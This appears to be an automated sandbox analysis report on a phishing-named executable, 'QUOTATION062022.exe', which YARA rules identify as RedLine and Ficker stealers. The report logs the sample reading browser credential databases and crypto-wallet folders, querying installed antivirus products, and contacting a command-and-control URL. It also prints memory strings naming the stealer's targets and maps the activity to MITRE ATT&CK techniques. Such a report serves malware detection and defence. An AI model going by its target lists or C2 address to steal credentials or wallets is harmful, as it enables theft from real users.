Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION062022.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION062022.exe PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Data.exe PID: 6952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR

Yara detected Ficker Stealer

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ok1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum0V
Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ok5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION062022.exe PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Data.exe PID: 6952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION062022.exe PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Data.exe PID: 6952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR

Yara detected Ficker Stealer

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	221 Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Masquerading	1 OS Credential Dumping	331 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	311 Process Injection	1 Access Token Manipulation	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Scheduled Task/Job	1 Disable or Modify Tools	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	241 Virtualization/Sandbox Evasion	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	311 Process Injection	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION062022.exe	47%	Virustotal		Browse
QUOTATION062022.exe	49%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
QUOTATION062022.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Data\Data.exe	49%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Download
23.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
4.0.vbc.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
4.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
4.0.vbc.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
23.0.vbc.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
23.0.vbc.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
23.0.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
4.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
23.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
23.0.vbc.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
4.0.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
4.0.vbc.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1234943	Download File

Domains

Source	Detection	Scanner	Label	Link
api.ip.sb	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://service.r	0%	URL Reputation	safe
http://ns.adobe.cobj_	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentme	0%	Avira URL Cloud	safe
http://tempuri.org/t_	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://ns.adobe.c/g_	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdates	0%	URL Reputation	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
http://185.222.58.90:17910	100%	Avira URL Cloud	malware
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	URL Reputation	safe
http://tempuri.org/0	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
https://helpx.ad	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnect	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnviron	0%	URL Reputation	safe
https://get.adob	0%	URL Reputation	safe
http://185.222.58.90:1	100%	Avira URL Cloud	malware
http://185.222.58.90:17910/	100%	Avira URL Cloud	malware
http://ns.ado/1_	0%	Avira URL Cloud	safe
http://forms.rea	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	URL Reputation	safe
http://185.222.58.90:179104	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.222.58.90:17910/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr, tmpE68F.tmp.23.dr	false		high
